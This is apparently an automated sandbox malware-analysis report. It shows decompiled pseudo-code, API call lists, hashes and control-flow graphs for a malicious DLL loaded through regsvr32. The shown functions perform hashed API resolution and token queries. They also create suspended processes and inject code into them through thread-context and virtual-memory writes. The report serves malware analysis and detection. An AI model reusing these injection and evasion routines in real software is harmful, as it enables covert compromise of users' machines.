                                                                                                                                                                                              					_t49 = E04AFE2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E04AFA43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                                              					_t51 = _v8;
                                                                                                                                                                                              					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t73 = _v20;
                                                                                                                                                                                              					_t47 = _t51 + 1;
                                                                                                                                                                                              					_v8 = _t47;
                                                                                                                                                                                              					if(_t47 < _v16) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                                              				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                                              				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                                              					return _t80;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t56 = 0;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_t70 = _t80[_t56];
                                                                                                                                                                                              						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                                              						_t56 = _t56 + 1;
                                                                                                                                                                                              						if(_t56 < 0x40) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                                              					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                                              					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                                              						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                                              					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                                              					if(_t58 == 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                                              					if(_t59 == 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t59;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 04AFEF8B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 04AFEF97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 2574300362-2738580789
                                                                                                                                                                                              • Opcode ID: 738d4dee761b756342e05de7105503ef5699af35ca0feec4a2a70353fff75889
                                                                                                                                                                                              • Instruction ID: 9fa2aa27cb1a1af8c558468baf137d167cfa07c1355105b86e7394bb717fcfd9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 738d4dee761b756342e05de7105503ef5699af35ca0feec4a2a70353fff75889
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6319071A001559BCB24CFEDCC80AAFBBF5AF44315F28446AEA45E73A1E730F9518B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 281 4afc7f5-4afc815 GetTokenInformation 282 4afc85b 281->282 283 4afc817-4afc820 GetLastError 281->283 284 4afc85d-4afc861 282->284 283->282 285 4afc822-4afc832 call 4af8bde 283->285 288 4afc838-4afc84b GetTokenInformation 285->288 289 4afc834-4afc836 285->289 288->282 290 4afc84d-4afc859 call 4af8bf4 288->290 289->284 290->289
                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                              			E04AFC7F5(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                              				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(_t22);
                                                                                                                                                                                              				_push(_t22);
                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                              				_t28 = __edx;
                                                                                                                                                                                              				_t20 = _t22;
                                                                                                                                                                                              				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                              					L6:
                                                                                                                                                                                              					_t12 = _t31;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t31 = E04AF8BDE(_v8);
                                                                                                                                                                                              					_v12 = _t31;
                                                                                                                                                                                              					if(_t31 != 0) {
                                                                                                                                                                                              						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							E04AF8BF4( &_v12, _t16);
                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						L3:
                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t12;
                                                                                                                                                                                              			}










                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04AF0000,00000000,00000000,?,04AFC876,00000000,00000000,?,04AFC89F), ref: 04AFC810
                                                                                                                                                                                              • GetLastError.KERNEL32(?,04AFC876,00000000,00000000,?,04AFC89F,00001644,?,04AFDFCE), ref: 04AFC817
                                                                                                                                                                                                • Part of subcall function 04AF8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,04AFC876,00000000,00000000,?,04AFC89F,00001644,?,04AFDFCE), ref: 04AFC846
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2499131667-0
                                                                                                                                                                                              • Opcode ID: 28d49060859c8f5a8830980c74a0797eddb5e7c373e0aa952275856f725f024a
                                                                                                                                                                                              • Instruction ID: 1d94cd95122c52a8d7a635218adb964231775ab2788a9e44c1adbc74997637be
                                                                                                                                                                                              • Opcode Fuzzy Hash: 28d49060859c8f5a8830980c74a0797eddb5e7c373e0aa952275856f725f024a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B0184B2700218BFAB305FE6DC48DAB7FACFF456B1750046AF605D3110E664ED0086E0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 293 4afbc84-4afbcd3 call 4af8d6d * 2 CreateProcessW
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E04AFBC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                                                                                                                                              				struct _STARTUPINFOW _v72;
                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                              
                                                                                                                                                                                              				E04AF8D6D(__edx, 0, 0x10);
                                                                                                                                                                                              				E04AF8D6D( &_v72, 0, 0x44);
                                                                                                                                                                                              				_v72.cb = 0x44;
                                                                                                                                                                                              				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				return  ~( ~_t11) - 1;
                                                                                                                                                                                              			}






                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 04AFBCC6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateProcessmemset
                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                              • API String ID: 2296119082-2746444292
                                                                                                                                                                                              • Opcode ID: 6d1923bc193fea70f887899bd375d7e977f3972519e2d6edbbdfbba8726a9ab2
                                                                                                                                                                                              • Instruction ID: d56e805af093536bf3adc0ac92dc0cb37ec8dc0fa7fe5f55154e219127bc81c2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d1923bc193fea70f887899bd375d7e977f3972519e2d6edbbdfbba8726a9ab2
                                                                                                                                                                                              • Instruction Fuzzy Hash: CCF030F16402087EFB30E6A59D0AFBF36ACDB51714F500125BB05EB1D0E6A4AD0582B5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 298 4abff20-4abffbe VirtualAlloc call 4abfb50 call 4abfb90 303 4abffc9-4abffd3 298->303 304 4ac0031-4ac0083 call 4abfcd0 303->304 305 4abffd5-4abffdc 303->305 313 4ac0085-4ac0089 304->313 314 4ac00b1-4ac00b8 304->314 306 4abffde-4abffe5 305->306 307 4ac0026-4ac002f 305->307 306->307 309 4abffe7-4ac0023 call 4abfb90 306->309 307->303 309->307 313->314 317 4ac008b-4ac00ae call 4abfc30 313->317 315 4ac00c3-4ac00cd 314->315 318 4ac011f-4ac0154 call 4ac0440 315->318 319 4ac00cf-4ac00d6 315->319 317->314 322 4ac00d8-4ac00df 319->322 323 4ac0114-4ac011d 319->323 322->323 325 4ac00e1-4ac0112 call 4ac0160 VirtualProtect 322->325 323->315 325->323
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04ABFF6B
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000000), ref: 04AC0112
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4aa0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Virtual$AllocProtect
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2447062925-0
                                                                                                                                                                                              • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                                                                                                                                                                              • Instruction ID: 7e488008798fe0cbe252caee5635002024b6fef945b21da31b9c731678a7406c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E91BAB5A00209DFDB48CF98C590EAEB7B5FF88304F148159E815AB346D735EA52CFA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 330 4afd804-4afd824 call 4afd6dc 333 4afd82a-4afd849 call 4afb557 330->333 334 4afd955-4afd958 330->334 337 4afd84f-4afd851 333->337 338 4afd945-4afd954 call 4af8bf4 333->338 339 4afd857-4afd859 337->339 340 4afd933-4afd943 call 4af8bf4 337->340 338->334 342 4afd85c-4afd85e 339->342 340->338 345 4afd864-4afd883 call 4af8d6d call 4afbc84 342->345 346 4afd921-4afd92d 342->346 352 4afd8e5-4afd8e9 345->352 353 4afd885-4afd898 call 4afd959 345->353 346->337 346->340 354 4afd8eb-4afd8ed 352->354 355 4afd914-4afd91b 352->355 353->352 360 4afd89a-4afd8b2 353->360 357 4afd8ef-4afd8f5 354->357 358 4afd8fe-4afd90e 354->358 355->342 355->346 357->358 358->355 363 4afd8b4-4afd8c9 GetLastError call 4afda57 360->363 364 4afd8e2 360->364 367 4afd8de-4afd8df FindCloseChangeNotification 363->367 368 4afd8cb-4afd8d6 363->368 364->352 367->364 370 4afd8d9 368->370 371 4afd8d8 368->371 370->367 371->370
                                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                                              			E04AFD804(intOrPtr __edx) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _t37;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                              				intOrPtr _t52;
                                                                                                                                                                                              				intOrPtr _t54;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				intOrPtr _t59;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				signed int _t67;
                                                                                                                                                                                              				intOrPtr _t69;
                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                              				intOrPtr _t86;
                                                                                                                                                                                              				char _t87;
                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                              				_v20 = __edx;
                                                                                                                                                                                              				_t86 = 0;
                                                                                                                                                                                              				_t37 = E04AFD6DC( &_v16);
                                                                                                                                                                                              				_t87 = _t37;
                                                                                                                                                                                              				_v24 = _t87;
                                                                                                                                                                                              				_t89 = _t87;
                                                                                                                                                                                              				if(_t87 == 0) {
                                                                                                                                                                                              					return _t37;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t38 =  *0x4b0f81c; // 0x4c2fbe8
                                                                                                                                                                                              				_t7 = _t38 + 0xac; // 0x1d290ddf
                                                                                                                                                                                              				E04AFB557( &_v80,  *_t7 + 7, _t89);
                                                                                                                                                                                              				_v12 = _v12 & 0;
                                                                                                                                                                                              				_t67 = _v16;
                                                                                                                                                                                              				if(_t67 == 0) {
                                                                                                                                                                                              					L21:
                                                                                                                                                                                              					E04AF8BF4( &_v24, 0);
                                                                                                                                                                                              					return _t86;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(_t86 == 0) {
                                                                                                                                                                                              					_t69 = 0;
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					while(_t86 == 0) {
                                                                                                                                                                                              						E04AF8D6D( &_v40, _t86, 0x10);
                                                                                                                                                                                              						_t88 = _t88 + 0xc;
                                                                                                                                                                                              						_t49 = E04AFBC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
                                                                                                                                                                                              						_t94 = _t49;
                                                                                                                                                                                              						if(_t49 >= 0) {
                                                                                                                                                                                              							_t56 = E04AFD959(E04AF61C5,  &_v40, _t94, _v20); // executed
                                                                                                                                                                                              							if(_t56 != 0) {
                                                                                                                                                                                              								_t59 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
                                                                                                                                                                                              								if(_t70 != 0) {
                                                                                                                                                                                              									GetLastError();
                                                                                                                                                                                              									_t62 = E04AFDA57( &_v40);
                                                                                                                                                                                              									_t63 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              									if(_t62 != 0) {
                                                                                                                                                                                              										_push(0xea60);
                                                                                                                                                                                              										_push(_t70);
                                                                                                                                                                                              										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
                                                                                                                                                                                              											_t86 = _t86 + 1;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t63 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              									}
                                                                                                                                                                                              									FindCloseChangeNotification(_t70);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t69 = _v8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v40 != 0) {
                                                                                                                                                                                              							if(_t86 == 0) {
                                                                                                                                                                                              								_t54 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t50 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t50 + 0x30))(_v36);
                                                                                                                                                                                              							_t52 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t52 + 0x30))(_v40);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t69 = _t69 + 1;
                                                                                                                                                                                              						_v8 = _t69;
                                                                                                                                                                                              						if(_t69 < 2) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t67 = _v16;
                                                                                                                                                                                              					_t45 = _v12 + 1;
                                                                                                                                                                                              					_v12 = _t45;
                                                                                                                                                                                              					if(_t45 < _t67) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                              					} while (_t67 != 0);
                                                                                                                                                                                              					goto L21;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				L20:
                                                                                                                                                                                              				E04AF8BF4(_t87, 0xfffffffe);
                                                                                                                                                                                              				_t87 = _t87 + 4;
                                                                                                                                                                                              				_t67 = _t67 - 1;
                                                                                                                                                                                              			}


                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8D6D: memset.MSVCRT ref: 04AF8D7F
                                                                                                                                                                                                • Part of subcall function 04AFBC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 04AFBCC6
                                                                                                                                                                                                • Part of subcall function 04AFD959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 04AFD9BB
                                                                                                                                                                                                • Part of subcall function 04AFD959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 04AFDA04
                                                                                                                                                                                                • Part of subcall function 04AFD959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 04AFDA21
                                                                                                                                                                                                • Part of subcall function 04AFD959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 04AFDA42
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000001), ref: 04AFD8B4
                                                                                                                                                                                                • Part of subcall function 04AFDA57: ResumeThread.KERNELBASE(?,04AFD8C2,?,?,00000001), ref: 04AFDA5F
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 04AFD8DF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2212882986-0
                                                                                                                                                                                              • Opcode ID: 3f5b8d17b9796315b735cc25000b86cf25c88742b0738b994815e4a184469a53
                                                                                                                                                                                              • Instruction ID: d295128d05f2c2eb11879d755f76e3d26f00891242e591580fcd923b1abf1b01
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f5b8d17b9796315b735cc25000b86cf25c88742b0738b994815e4a184469a53
                                                                                                                                                                                              • Instruction Fuzzy Hash: 47416D71A002099FDB22DFE5DD84AEEB7F9FF48315F1040A9F606A7251DB74A9418B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 372 4ac0340-4ac0368 373 4ac036e-4ac0374 372->373 374 4ac0430-4ac0433 372->374 375 4ac0377-4ac037e 373->375 375->374 376 4ac0384-4ac03a6 375->376 378 4ac03a8-4ac03b1 376->378 379 4ac0422-4ac042b 376->379 380 4ac03b4-4ac03ba 378->380 379->375 380->379 381 4ac03bc-4ac03c4 380->381 382 4ac03c6-4ac0415 VirtualProtect * 2 381->382 383 4ac0417-4ac0420 381->383 382->374 383->380
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000004,00000040,?), ref: 04AC03DB
                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 04AC0413
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677304446.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4aa0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                              • Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                                                                                                                                                                              • Instruction ID: 57e7315d5a89b9cb1e121afcbd1a219a27ba1690f97ba4f7c1dd87e66c9db337
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: 23419774A04209EFCB48CF88C990BEEB7B1FF88314F148199E915AB355D775AA41CF94
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                                                              			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                                                              				WCHAR* _t23;
                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                              				intOrPtr* _t49;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				if(_a8 != 1) {
                                                                                                                                                                                              					__eflags = _a8;
                                                                                                                                                                                              					if(_a8 != 0) {
                                                                                                                                                                                              						L7:
                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                              						return 1;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t15 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
                                                                                                                                                                                              					L3:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E04AF8BC9();
                                                                                                                                                                                              				E04AF9591();
                                                                                                                                                                                              				 *0x4b0f830 = _a4;
                                                                                                                                                                                              				E04B03CD5(_a4);
                                                                                                                                                                                              				 *_t49 = 0xf43;
                                                                                                                                                                                              				 *0x4b0f818 = E04AFF05C(0x4b0ca50, 0x138);
                                                                                                                                                                                              				 *_t49 = 0x111;
                                                                                                                                                                                              				_t23 = E04AF9DF2(0x4b0ca50);
                                                                                                                                                                                              				_pop(_t41);
                                                                                                                                                                                              				_a8 = _t23;
                                                                                                                                                                                              				_t24 = GetFileAttributesW(_t23); // executed
                                                                                                                                                                                              				_push( &_a8);
                                                                                                                                                                                              				if(_t24 == 0xffffffff) {
                                                                                                                                                                                              					E04AF8BAF();
                                                                                                                                                                                              					 *_t49 = 0x40e;
                                                                                                                                                                                              					_t28 = E04AF9CB5(E04AF109A(_t41));
                                                                                                                                                                                              					_a8 = _t28;
                                                                                                                                                                                              					__eflags = _t28;
                                                                                                                                                                                              					if(_t28 != 0) {
                                                                                                                                                                                              						_t48 = 0x54;
                                                                                                                                                                                              						 *0x4b0f828 = E04AFF05C(0x4b0cbb8, _t48);
                                                                                                                                                                                              						E04AF6370(_t48, __eflags);
                                                                                                                                                                                              						E04AF8BF4( &_a8, 0xfffffffe);
                                                                                                                                                                                              						_t36 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                              					_t31 = CreateThread(0, 0, E04AF6298, 0, 0,  &_v8);
                                                                                                                                                                                              					 *0x4b0f83c = _t31;
                                                                                                                                                                                              					__eflags = _t31;
                                                                                                                                                                                              					if(_t31 == 0) {
                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E04AF8BAF();
                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                              			}













                                                                                                                                                                                              0x04af65ab
                                                                                                                                                                                              0x04af65c5
                                                                                                                                                                                              0x04af65c8
                                                                                                                                                                                              0x04af65cb
                                                                                                                                                                                              0x04af65d0
                                                                                                                                                                                              0x04af65d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04af65d2
                                                                                                                                                                                              0x04af6550
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AF8BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,04AF6502), ref: 04AF8BD2
                                                                                                                                                                                                • Part of subcall function 04AFF05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,04B0CA50,?,04AF652B,?), ref: 04AFF07E
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 04AF6541
                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,04AF6298,00000000,00000000,?), ref: 04AF65C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 607385197-0
                                                                                                                                                                                              • Opcode ID: c379da720500c8dd43712a74abd95a4797497ac692762218d68d67c3fd5b57e2
                                                                                                                                                                                              • Instruction ID: 25693371b740eb34305d01c9394546becdc147c4b04e37213a7a9325fc8f3705
